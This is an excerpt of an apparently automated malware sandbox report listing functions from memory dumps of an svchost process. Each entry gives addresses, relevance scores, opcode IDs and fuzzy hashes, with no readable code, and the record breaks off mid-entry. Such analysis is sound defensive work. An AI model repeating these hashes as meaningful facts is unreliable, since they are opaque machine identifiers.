                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l
                                                                        • API String ID: 0-367637329
                                                                        • Opcode ID: 429cf66dfd1efcb1c2bf3e204e8bd452374f7588073c84d2f8851d54240a10aa
                                                                        • Instruction ID: 1633a9876b9b6aa32ac5a0838179c59acff87c71d054a4b6b93124fcbe9a26a3
                                                                        • Opcode Fuzzy Hash: 429cf66dfd1efcb1c2bf3e204e8bd452374f7588073c84d2f8851d54240a10aa
                                                                        • Instruction Fuzzy Hash: 73812930A002588FDB14EFB4D854BEDB7B2EF49308F1085AAD40AAB694DF795E85CF51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC3B18 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 2(l
                                                                        • API String ID: 0-367637329
                                                                        • Opcode ID: b8383062a94054dd227853d21286884df07cd3803a1c4bc532e64294e6ce554d
                                                                        • Instruction ID: 09470ea4a56398cb09f7065df75ea45e4d391d736eed5ee801dfcd26085d173c
                                                                        • Opcode Fuzzy Hash: b8383062a94054dd227853d21286884df07cd3803a1c4bc532e64294e6ce554d
                                                                        • Instruction Fuzzy Hash: BE414B34A00258CFDB14EFB5D8547ECB7B2FF45308F1085AAD00AAB694DB795E45CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC75C9 Relevance: 1.2, Instructions: 1239COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c89a7ca8173b296875d9d1904f9f974c25e397b3d5089bd81eaf389a86548ec8
                                                                        • Instruction ID: 91c97109ed46ae4daa042904d63d6bbae693a1f37c913a790a2bab58a4a49b71
                                                                        • Opcode Fuzzy Hash: c89a7ca8173b296875d9d1904f9f974c25e397b3d5089bd81eaf389a86548ec8
                                                                        • Instruction Fuzzy Hash: 53B24C38B041A5DFEB159B25D8517BE7BF6EB68304F00849AD859A3780DF398D4ADF20
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC7644 Relevance: 1.1, Instructions: 1079COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dd624616f2b0fbe155523a82d5662151286aa1e5d0a7b93c000dae3becb96d0e
                                                                        • Instruction ID: c6a8a3b3c063c3b579f99c5ac6b6009cb6eb2ef75114c028a52472a3f6c83b36
                                                                        • Opcode Fuzzy Hash: dd624616f2b0fbe155523a82d5662151286aa1e5d0a7b93c000dae3becb96d0e
                                                                        • Instruction Fuzzy Hash: CC927134B041A59BEF159B35D8117BE7BF6EB68308F04449AD48AA3784CF398D4ADF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC767E Relevance: 1.1, Instructions: 1076COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: dcd983c3b37d318bdd231a571817c2accef89189a7e0a27825e302d84ee1c2b9
                                                                        • Instruction ID: 4399e92339a815c53e45233e76c2856b15a7cbe884dd670a901bdf200735d392
                                                                        • Opcode Fuzzy Hash: dcd983c3b37d318bdd231a571817c2accef89189a7e0a27825e302d84ee1c2b9
                                                                        • Instruction Fuzzy Hash: 69927134B041A59BEF159B3598117BE7BF6EB68308F04449AD48AA3784CF398D4ADF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC76AD Relevance: 1.1, Instructions: 1075COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a214a9aa22bac20e5788d115f0f9b4bc4b6b8a797502afabd24ad45498944286
                                                                        • Instruction ID: 67369ce22ced7edf111a2dc40f9c39230e0e3046d7e35aad5de1f4c0bfd1d9fc
                                                                        • Opcode Fuzzy Hash: a214a9aa22bac20e5788d115f0f9b4bc4b6b8a797502afabd24ad45498944286
                                                                        • Instruction Fuzzy Hash: EA927134B041A59BEF159B3598117BE7BF6EB68308F04449AD48AA3784CF398D4ADF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8BF0 Relevance: .3, Instructions: 335COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 93f2e6d8e73678ac58270abb33db222f5727c6d1134f1abd3a941c731160d501
                                                                        • Instruction ID: 87aa618a08e9d1644c72d3a001d520ba9497b095414b2a4c1ae80778d579b53a
                                                                        • Opcode Fuzzy Hash: 93f2e6d8e73678ac58270abb33db222f5727c6d1134f1abd3a941c731160d501
                                                                        • Instruction Fuzzy Hash: A2D18F35B00209EFDB09DF75E450AAE77B2FF98348B108469E416A77A4DF39AC06CB50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8BE1 Relevance: .3, Instructions: 267COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a689fc8c86fc24b253f37d45f7ec1ef32e434a77eedb8f19669db2c3f704da47
                                                                        • Instruction ID: a182dfd99aa9894ba55544ac2c39ecb8f6aea0db76ccb0ed009f444fc8145fc3
                                                                        • Opcode Fuzzy Hash: a689fc8c86fc24b253f37d45f7ec1ef32e434a77eedb8f19669db2c3f704da47
                                                                        • Instruction Fuzzy Hash: 5BA14F35B00209EFDB09DF75E450AAE77B6FF98348B108569E416977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8CF5 Relevance: .2, Instructions: 232COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 9d25cb78502a36b9ccc854df490fcd0a1ff9efb65197b022f35815ddcc1c5ace
                                                                        • Instruction ID: 55fbc28e1810d14a6e4e12f209735608edf780063c8450d4f4ca10979d16f014
                                                                        • Opcode Fuzzy Hash: 9d25cb78502a36b9ccc854df490fcd0a1ff9efb65197b022f35815ddcc1c5ace
                                                                        • Instruction Fuzzy Hash: A0913C34B00209EFDB09DF75E450AAE77B2FF98348B11856AE416977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8D53 Relevance: .2, Instructions: 221COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ca2e4922578cb684fd4c0b12383b13dbb9514526c2d5334d29cdfcca2e0d9ad9
                                                                        • Instruction ID: eebc8768ae0b387a91518062d338cd5a5b820f361f27c97c42f18b9bf2848adf
                                                                        • Opcode Fuzzy Hash: ca2e4922578cb684fd4c0b12383b13dbb9514526c2d5334d29cdfcca2e0d9ad9
                                                                        • Instruction Fuzzy Hash: 2C913C34B00215EFDB19DF74E450AAE77B2FF98348B11856AE816977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8DA3 Relevance: .2, Instructions: 214COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 4019f416224c22bcd3dd8b79e0f062bcfbd8801d9931ec5211554f8d0b16c35f
                                                                        • Instruction ID: feb347f18fa145d79839db24cceeeb290dbf511466154a9c4b8461dda4cca527
                                                                        • Opcode Fuzzy Hash: 4019f416224c22bcd3dd8b79e0f062bcfbd8801d9931ec5211554f8d0b16c35f
                                                                        • Instruction Fuzzy Hash: DE811934B00215EFDB19DF74E450AAE77B2FF98348B11856AE816977A4DF39AC06CB40
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8E25 Relevance: .2, Instructions: 193COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 36f707205baa346e21fd259a90a6cb1959648a988c3bd7c4b992c497fa2510e9
                                                                        • Instruction ID: f3984f3429f8772040a42f60b9a872ecbdd7121d82d23279ac4400bd1d49c193
                                                                        • Opcode Fuzzy Hash: 36f707205baa346e21fd259a90a6cb1959648a988c3bd7c4b992c497fa2510e9
                                                                        • Instruction Fuzzy Hash: BD711A34B00214EFDB19DF74E450AAE77B2FF98348B11856AE816977A4DF39AC06CB41
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC717B Relevance: .2, Instructions: 154COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: d2477dac7756adf8d6a5a41eaed6595b161ba1c661d974b86e7ece0f10f16654
                                                                        • Instruction ID: 0bd7ca9b6f9f37b60a379562921bf373318000e017d33883e502a0a402507647
                                                                        • Opcode Fuzzy Hash: d2477dac7756adf8d6a5a41eaed6595b161ba1c661d974b86e7ece0f10f16654
                                                                        • Instruction Fuzzy Hash: 8651BE30608242DBEB15CF3698457A97BE6FB45315F1889ADE452DB2D0EF38DE06CB60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC8F15 Relevance: .1, Instructions: 146COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: ef883b01c613e38428aa1cb8a87e98c356c40165aaa7261e55713c42c73b8d13
                                                                        • Instruction ID: 7f33d2cdf87f2bf38308d8141ffb2a8efd9016108c0604ef6a9c8f43d80b9837
                                                                        • Opcode Fuzzy Hash: ef883b01c613e38428aa1cb8a87e98c356c40165aaa7261e55713c42c73b8d13
                                                                        • Instruction Fuzzy Hash: E1516E34B002159FDB18DF75E450AAE77B2EF98348F10846AE816977D4DF399C06CB91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC756E Relevance: .1, Instructions: 137COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 66d77fa70bc050691a42d4a60dbbf179a0858019d146fa128296fa639d8a9009
                                                                        • Instruction ID: 6c9985f2474a629f5208765db7063fa8fc1b4dd03e6243e66344a2ffc6d55bd8
                                                                        • Opcode Fuzzy Hash: 66d77fa70bc050691a42d4a60dbbf179a0858019d146fa128296fa639d8a9009
                                                                        • Instruction Fuzzy Hash: 4E41AD35604216DBEB15DF3698457A93AE2FB44355F1889ADE422DB2D0DF38DE02CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC0958 Relevance: .1, Instructions: 109COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: f3c716f44b90726fee2656526fa48e68df36aefc39d8da92e46b3f2635dcda79
                                                                        • Instruction ID: e12e8a188415feba0644ef84b60966a4caa1b367054ddb076514ce082044ddfd
                                                                        • Opcode Fuzzy Hash: f3c716f44b90726fee2656526fa48e68df36aefc39d8da92e46b3f2635dcda79
                                                                        • Instruction Fuzzy Hash: CD31D031B00215AFDB04BB74D8157BE36ABEB98208F40487AD405E7794EF3D9D0AC791
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC94F0 Relevance: .1, Instructions: 107COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 00c53ba523d1b92944348f74202a5d82d76fc2e93eea8d1f99cd1aa14a8befdd
                                                                        • Instruction ID: 58a044caf279f63a102bd1d61f148da976fa0f9a42ee61313ffe16ca46178cf6
                                                                        • Opcode Fuzzy Hash: 00c53ba523d1b92944348f74202a5d82d76fc2e93eea8d1f99cd1aa14a8befdd
                                                                        • Instruction Fuzzy Hash: 1B31AA30B002059FDB14DF75C884BAEBBF6AF88714F1485A9E405EB3A0CF74AD058B91
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03401245 Relevance: .1, Instructions: 62COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 359e035c7b18898f22dbc4ddfbe8778191920203a3c2048118913e9fedf4f3a1
                                                                        • Instruction ID: ae46eb5138a5db1239d3d0d2fec218a72d241ca297e1a5534bc67b0369cb97d0
                                                                        • Opcode Fuzzy Hash: 359e035c7b18898f22dbc4ddfbe8778191920203a3c2048118913e9fedf4f3a1
                                                                        • Instruction Fuzzy Hash: 022128352097C09FD7078B60C960B52BFB1AF4B714F1985EAD4848F6A3C27A9816DB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06581FE0 Relevance: .1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 577a877b4bfd593a26befb225fc3f4d4a3963878cb72f3ced78a9de36c9c1ce2
                                                                        • Instruction ID: dd8b92d2d9bb33aae5e8a4ac7cfe7881f2367d1c2594031cdae265afafd74241
                                                                        • Opcode Fuzzy Hash: 577a877b4bfd593a26befb225fc3f4d4a3963878cb72f3ced78a9de36c9c1ce2
                                                                        • Instruction Fuzzy Hash: C911B8B5908341AFD350CF19D880A5BFBE4FB88664F04895EF99897311D231E9048FA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0340127C Relevance: .1, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: afb04a9148633409fbc65daa6330cdcf55ce49d74efd5a44a0b83bdd672bf2cb
                                                                        • Instruction ID: a8980b74dddd40bb099108b85aa31ed4f7ee9ac323ecf9020a89213f0a251f46
                                                                        • Opcode Fuzzy Hash: afb04a9148633409fbc65daa6330cdcf55ce49d74efd5a44a0b83bdd672bf2cb
                                                                        • Instruction Fuzzy Hash: 9711E4383042809FD315CB54D580B26FBE5AB89708F28C9AEE8495BB92C777D803CA55
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03401254 Relevance: .1, Instructions: 56COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2681ad66752e8d1a7777201c64af176abd2702aad0e31a3a55b4257e4e96b6f6
                                                                        • Instruction ID: 508beb8961748c8f92784b1b176e678073bc835ed27e79d355ba651911069d2e
                                                                        • Opcode Fuzzy Hash: 2681ad66752e8d1a7777201c64af176abd2702aad0e31a3a55b4257e4e96b6f6
                                                                        • Instruction Fuzzy Hash: 62212C3510D3C09FD7038B60C950B12BFB1AF4B714F1985DAD4858F6A3C2369816DB52
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC9210 Relevance: .1, Instructions: 55COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e1bf127348e8e5d190993655bfd9102a7738a4d7b0f3c6928404d2e38c98980f
                                                                        • Instruction ID: d476a42d79224b1f9203245d0fb37ef1f27d8b82695709ddbc1b79cee469c643
                                                                        • Opcode Fuzzy Hash: e1bf127348e8e5d190993655bfd9102a7738a4d7b0f3c6928404d2e38c98980f
                                                                        • Instruction Fuzzy Hash: 4211A171F002198FCF14DBB8D8455AE77F6EB8A254710457AC40AE7790EF349D06CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC0007 Relevance: .1, Instructions: 54COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 1ba056fbb47f0643c344fac5a31d0e5e06d9b4a1619eef250d299c34be69ac6e
                                                                        • Instruction ID: 71bb3bad9ebad8c37b99108ffa308c3c95bb47f67c636ffc069b4aa0ac443c03
                                                                        • Opcode Fuzzy Hash: 1ba056fbb47f0643c344fac5a31d0e5e06d9b4a1619eef250d299c34be69ac6e
                                                                        • Instruction Fuzzy Hash: F501B36105E3C59FD7039B24DC656913FB0AB17214F4A89D7D080CB6A7D668580A9762
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 06581E84 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4125943774.0000000006580000.00000040.00000800.00020000.00000000.sdmp, Offset: 06580000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_6580000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 73870506539e62388ba583a035305bf13b5d3cd5f1a2794b26b6f5662014ede0
                                                                        • Instruction ID: 832f2eb16f5920acc183069348d325a0090721c4091855f958e4d3ce1877ac2b
                                                                        • Opcode Fuzzy Hash: 73870506539e62388ba583a035305bf13b5d3cd5f1a2794b26b6f5662014ede0
                                                                        • Instruction Fuzzy Hash: 0511FAB5908305AFD350CF09DC84E5BFBE8EB88660F04881EF99897311D231E9088FA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033CB128 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4085183956.00000000033CA000.00000040.00000800.00020000.00000000.sdmp, Offset: 033CA000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33ca000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 0335eab9e66929c13dbe35a33a86cd59ffdfd6aafae45a92456d240474f4a7a7
                                                                        • Instruction ID: 95f76bed43f33006b95289979639c9a3130a301b85cc9bdaf221eb0ed8b21422
                                                                        • Opcode Fuzzy Hash: 0335eab9e66929c13dbe35a33a86cd59ffdfd6aafae45a92456d240474f4a7a7
                                                                        • Instruction Fuzzy Hash: 5A11FAB5908301AFD350CF09DC84E5BFBE8EB88660F04891EF95897311D231E9088FA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03401048 Relevance: .0, Instructions: 44COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 405ba03eb5e9355b472a87808301efc577067084bff6257e5f958f0441e00103
                                                                        • Instruction ID: d94f868b34741a45e858308200b20833e1168393519ac64b3dd1dc9087fcbe62
                                                                        • Opcode Fuzzy Hash: 405ba03eb5e9355b472a87808301efc577067084bff6257e5f958f0441e00103
                                                                        • Instruction Fuzzy Hash: 6001D6B65497C06FC3118B16AC40863BFF8DF4623070984ABE848CB612D275B908CBB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC0879 Relevance: .0, Instructions: 40COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 7132925ce44200dc20fcf7c74f3533a4100e4d9483f352033960ff06a6949c61
                                                                        • Instruction ID: fa2c41215c133db38ef497ff38634756082e548bc4e0b4a09a181533734d5ed4
                                                                        • Opcode Fuzzy Hash: 7132925ce44200dc20fcf7c74f3533a4100e4d9483f352033960ff06a6949c61
                                                                        • Instruction Fuzzy Hash: B5015239A21246CFDB00FB35D0A85AD77E1EB94205F408A2CE145CB748EF749C059B82
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 05CC00A8 Relevance: .0, Instructions: 39COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4124106630.0000000005CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05CC0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_5cc0000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8f50a96a7723829cfc4d50cb0f73a8a69c8bd8db69e426d824b913793e3c762d
                                                                        • Instruction ID: 0f25a487ffa8594c786a350f3d1156ee497a1187de358f688981faf80c3911fe
                                                                        • Opcode Fuzzy Hash: 8f50a96a7723829cfc4d50cb0f73a8a69c8bd8db69e426d824b913793e3c762d
                                                                        • Instruction Fuzzy Hash: 20F02B76A013487FEB04DB70CC42BAEBB66DB81624F0085AEE5459F2C1DE35DD428780
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 03401338 Relevance: .0, Instructions: 31COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 373dd4dcb259c2d40da9d8fe2cc12b47e94007f7a6b350f9e39d69f30ae9e2b7
                                                                        • Instruction ID: a95f589e148ec446a2d10417c4d41ee7d86552548951fa304906614244f50495
                                                                        • Opcode Fuzzy Hash: 373dd4dcb259c2d40da9d8fe2cc12b47e94007f7a6b350f9e39d69f30ae9e2b7
                                                                        • Instruction Fuzzy Hash: D8F01D39204644DFC306CB50D540B16FBA6EB89718F28CAADE9491BB62C337E813DA85
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0340106E Relevance: .0, Instructions: 27COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.4099844090.0000000003401000.00000040.00000020.00020000.00000000.sdmp, Offset: 03401000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_3401000_svchost.jbxd
                                                                        Similarity
                                                                        • API ID:
